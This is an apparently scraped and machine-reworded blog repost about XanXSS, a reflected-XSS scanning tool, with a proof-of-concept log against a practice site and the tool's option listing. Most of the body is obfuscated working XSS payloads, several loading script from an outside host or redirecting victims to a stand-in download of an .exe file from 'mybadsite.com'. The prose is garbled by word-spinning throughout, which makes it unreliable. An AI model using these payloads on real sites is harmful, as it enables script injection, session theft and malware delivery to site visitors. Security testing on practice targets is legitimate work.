Xanxss - A Unproblematic Xss Finding Tool

Xanxss - A Unproblematic Xss Finding Tool - Hi friends mederc, In the article that you read this time with the title Xanxss - A Unproblematic Xss Finding Tool, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts Article Headers, Article Payload, Article Python, Article Reflected XSS, Article Scanners, Article Scripts, Article XanXSS, Article XSS, Article XSS Scanners, we write this you can understand. Alright, happy reading.

Title : Xanxss - A Unproblematic Xss Finding Tool
link : Xanxss - A Unproblematic Xss Finding Tool

ALSO READ


Related

Xanxss - A Unproblematic Xss Finding Tool

XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based from templates. Unlike other XSS scanners that but run through a listing of payloads. XanXSS tries to brand the payload unidentifiable, for example:
<xAnXSS</TitLE></STYLE><SVG/ONload='alERt(1);'/></XaNxSs</titLe></StYlE><SvG/ONlOAD='alerT(1);'/> <ifrAmE&#13;Src=&#160;[2].Find(CoNfirm);=&#160;"JAVaScRIpT:proMpT(1))"javAscrIpt:/*--></scRIPt> />cLIcK&#13;Me!</b</TextaRea></TiTLE><BUTtON ONcLIck='aleRT(1);'/>XaNxss</TEXTaRea> <iMG&#13;sRc=%0acONfIRM();=+'jAVASCRiPT:alerT("XSS");'</STYlE><Svg/onLoad='alErT((1));'/>
With XanXSS every payload is different. XanXSS plant past times running through the payloads until a specified reveal is establish or a timer hits the max time, this prevents it from looping for to long. Some of the features included inwards XanXSS:
  • Ability to transcend your ain headers using -H
  • Ability to generate a polyglot script using -P
  • Ability to run behind a proxy using --proxy
  • And many more

Proof of Concept
For this proof of concept nosotros volition role https://xss-game.appspot.com/level1/frame
admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v       ____  ___             ____  ___  _________ _________     \   \/  /____    ____ \   \/  / /   _____//   _____/      \     /\__  \  /    \ \     /  \_____  \ \_____  \       /     \ / __ \|   |  \/     \  /        \/        \     /___/\  (____  /___|  /___/\  \/_______  /_______  /           \_/    \/     \/      \_/        \/        \/  Twitter->   @stay__salty Github -->  ekultek          Version---> v(0.1)   [info][16:37:34] using default payloads [info][16:37:34] generating payloads [info][16:37:34] running payloads through tampering procedures [info][16:37:34] payloads tampered successfully [info][16:37:34] running payloads [debug][16:37:34] running payload '<xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/   >' [debug][16:37:34] running payload '<SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>' [debug][16:37:34] running payload '<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>' [debug][16:37:34] running payload '<iMG/+/sRc=%0dA=%0DPrOMpt,a(();=%0a'JaVaSCripT:aLeRt("XSS"));'javasCRiPT:/*--></sCRipt>' [debug][16:37:34] running payload '<SCRIPT/*/srC=&#34;&#62;A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js'</TeXTARea></TiTLE><buTTOn oncLiCK='ALeRT(1);'/>XAnXsS</tEXTARea></scrIPTjaVaSCRipT:/*--></sCRIPt>' [debug][16:37:35] running payload '<IMg&#160;SRC=%09CONFIRM(());=%0a'JavAscrIpt:aLERt("XSS");'JavasCrIpT:/*--></SCripT>' [debug][16:37:35] running payload '<XAnXSS</STYlE><SVg/OnLOAd='aLeR   T(1));'/></xAnXsSjaVasCRIpt:/*--></scrIpt>' [debug][16:37:35] running payload '<sCRIPt`Src=+cOnFiRm());=+'htTP://xSs.rOCKs/xsS.js'</TextaREA></tiTle><ButTon ONCliCK='AlErt(1);'/>xanxSS</TeXTarEa></SCriPtJAvaScrIPt:/*--></SCrIpt>' [debug][16:37:35] running payload '<scRIpT</title></stYle><sVG/onlOAD='AlERT(1));'/>aLert((1));</scRipT</titLE></STyLe><sVG/oNlOad='aLeRt((1));'/>' [debug][16:37:35] running payload '<SC\u009lripT/*/SrC=%0aConFirm();=&#160;'hTTP://xsS.ROcks/xSs.js'</TITle></StYlE><svg/ONLOad='ALerT(1);'/></ScriPT</StyLe><svG/OnLOAd='ALert((1);'/>' [debug][16:37:35] running payload '<B//ONMOuSEOver=&#34;&#62;ConFIrm(();=&#160;wIndow.LoCATIoN=&#160\u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--></sCrIPt>ClIcK/*/mE!</b</tiTLe>   </sTyLE><sVG/OnLoAd='aLert(1));'/>' [debug][16:37:35] running payload '<IfRA\u007pmeSrC=%0AcOnFIRm(());=%0a"jaVAScriPT:pRoMPT(1)"jAVaScRIpt:/*--></SCriPt>' [debug][16:37:36] running payload '<IframE//SrC=&#34;&#62;CONfIRM());=%0d"jAvAscriPT:pROMpT(1)"</TeXtarEa></TiTLe><BUttoN oNcliCK='aLERt((1));'/>XanXss</texTAReA>' [debug][16:37:36] running payload '<iMG/+/SRc=%09[3].FInd(COnFIRm));=&#34;&#62;'javAscriPt:A\u004pLerT("XSS");'JavaSCriPt:/*--></sCripT>' [debug][16:37:36] running payload '<imG&#160;SRc=%0d[2].FinD(cOnFiRm));=&#160;'JaVaScRipt:ALERt("XSS"));'</styLe><SVg/oNLoad='ALErT(1));'/>' [debug][16:37:36] running payload '<script</tITLE></style><SVG/onLOAD='alerT(1);'/>AleRt(1);</ScRIpTjAvASCrIPT:/*--></scRIPt>' [debug][16:37:36] running payload '<XaNxSs</tITle></sTYlE><SVg/ONload='aLERT((1);'/><   /xANxsS</stYLE><Svg/OnlOAD='AleRt(1);'/>' [debug][16:37:36] running payload '<b//ONmOUSEoVEr=%0D[8].fInd(coNfIrM);=%09WinDoW.location=%0A(COnfiRm)(();=&#160;'htTPS://MYBadsite.cOM/DoWNlOaD.php?ITEm=+COnFIrM();=+puMPEDupKickS.ExE'</styLe><sVG/OnLOAd='alERt((1);'/>CLickMe!</b</sTYlE><SVG/onloAD='AlERt(1);'/>' [debug][16:37:37] running payload '<scriPT</styLE><SvG/ONloaD='aLERT(1);'/>ALeRt(1);</SCrIPt</tiTLe></STYlE><sVG/OnloAd='aLeRT(1\u009x);'/>' [debug][16:37:37] running payload '<iFRamEsrC=&#34;&#62;[7].FInD(cOnFiRm);=%0A"javAsCRipT:prompt(1))"</tITlE\u009e></sTyle><svg/oNLOad='alert((1);'/>' [debug][16:37:37] running payload '<b/*/OnmOusEOver=&#160;A=%0apROMpt,A();=+wINdOW.LOCAtIon=&#34;&#62;co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=&#34;&#62;puMpedUPKickS.eXe'</teXtaREa></ti   TLe><BUTTON oNclIck='aLeRT((1);'/>XanXsS</texTAREA>cLICk/*/Me!</B</StylE><SVG/ONloAd='aLERt((1));'/>' [debug][16:37:37] running payload '<XANxSSJaVaScRIpt:/*--></SCripT></XAnXSs</TExtAREa></tITle\u008w><b\u009fuTTON oNclIck='Ale\u003rRT((1);'/>xANXss</TEXTArEA>' [debug][16:37:37] running payload '<SCript/*/sRC=+A=&#160;prOmpt,A();=&#160;'HtTp://XsS.rocKS/xsS.JS'</stylE><sVG/onLoad='AlErT((1);'/></SCriptjAvaScriPt:/*--></ScrIpt>' [debug][16:37:37] running payload '<ImG&#13;SRc=&#34;&#62;Co\U006efIr\u006D();=%0a\u007u'javAsCript:AlerT(("XSS");'</titlE></StYLe><svg/onloAD='alERt(1);'/>' [debug][16:37:38] running payload '<B/*/ONmouSeOvEr=%0Aa=&#160;prOmpT,A();=%09WIndOw.LOCAtION=%0Aa=%09prompt,a();=%0A'hTTps://MYBadsITe.COM/DOWNLOAD.PHp?ITeM=&#160;cO\u006Efir\u006D());=%0dPumPeduPkicks.EXE'</tITlE></StyLE><svg   /OnlOAD='aLerT((1));'/>clIcK&#13;mE!</bJavASCript:/*--></sCrIPT>' [warning][16:37:48] times upwards dumping establish [info][16:37:48] working payloads: --------------------------------------------------     > <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>     > <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>     > <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/> -------------------------------------------------- [info][16:37:48] establish a total of iii working payloads admin@TBG-a0216: /bin/python/xanxss$ 
Now lets banking concern fit those scripts inwards the HTML of the website:
Payload:<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>


Payload: <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>


Payload: <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>


Options
XanXSS comes consummate amongst the mightiness to role a proxy, is compatible amongst proxychains, in addition to allows yous to add together custom headers. I cause got provided a total listing of options for your convience:
usage: xanxss.py [-h] [-u http://test.com/test.php?id=] [-a VERIFY]                  [-f AMOUNT] [-t TIME] [-p SCRIPT, [SCRIPT, ...]]                  [-F FILE-PATH] [-v] [--proxy TYPE://IP:PORT]                  [-H HEADER=VALUE,HEADER:VALUE] [--throttle TIME secs] [-P]  optional arguments:   -h, --help            exhibit this assist message in addition to transcend   -u http://test.com/test.php?id=, --url http://test.com/test.php?id=                         transcend a URL to essay out for XSS vulnerabilities. it is                         recommended that yous role a URL amongst a enquiry parameter   -a VERIFY, --amount VERIFY                         how many verifications steps to travel taken, this volition                         decide how reliable the payload is. the to a greater extent than                         verification steps the to a greater extent than reliable the payload volition                         travel (*default=5)   -f AMOUNT, --find AMOUNT                         a   ttempt to detect this amount of working payloads,                         specifying this does non guarantee yous volition detect this                         amount of working payloads (*default=25)   -t TIME, --time TIME  amount of fourth dimension inwards seconds to pass on testing, this                         volition travel used every bit a timer for the verification                         (*default=35s)   -p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]                         transcend a comma separated listing of your ain payloads, must                         comprise at to the lowest degree v payloads   -F FILE-PATH, --file FILE-PATH                         transcend a textual file containing payloads i per line,                         must comprise at to the lowest degree v payloads   -v, --verbose         run inwards verbose agency in addition to display to a greater extent than output                         (*default=False)   --proxy TYPE://IP:PORT                         transcend a proxy inwards the format type://ip:port   -H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE                         add together your ain custom headers to the asking                         (*default=connection,user-agent)   --throttle TIME (secs)                         bound each asking amongst a slumber fourth dimension (*default=0)   -P, --polyglot        generate a polyglot script to append to the halt of the                         running scripts, if at that spot is XSS this should detect it                         (*default=False)




Thus the article Xanxss - A Unproblematic Xss Finding Tool

That's all the article Xanxss - A Unproblematic Xss Finding Tool this time, hopefully can benefit you all. okay, see you in another article posting.

You are now reading the article Xanxss - A Unproblematic Xss Finding Tool with the link address https://mederc.blogspot.com/2019/09/xanxss-unproblematic-xss-finding-tool.html

Related Posts

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel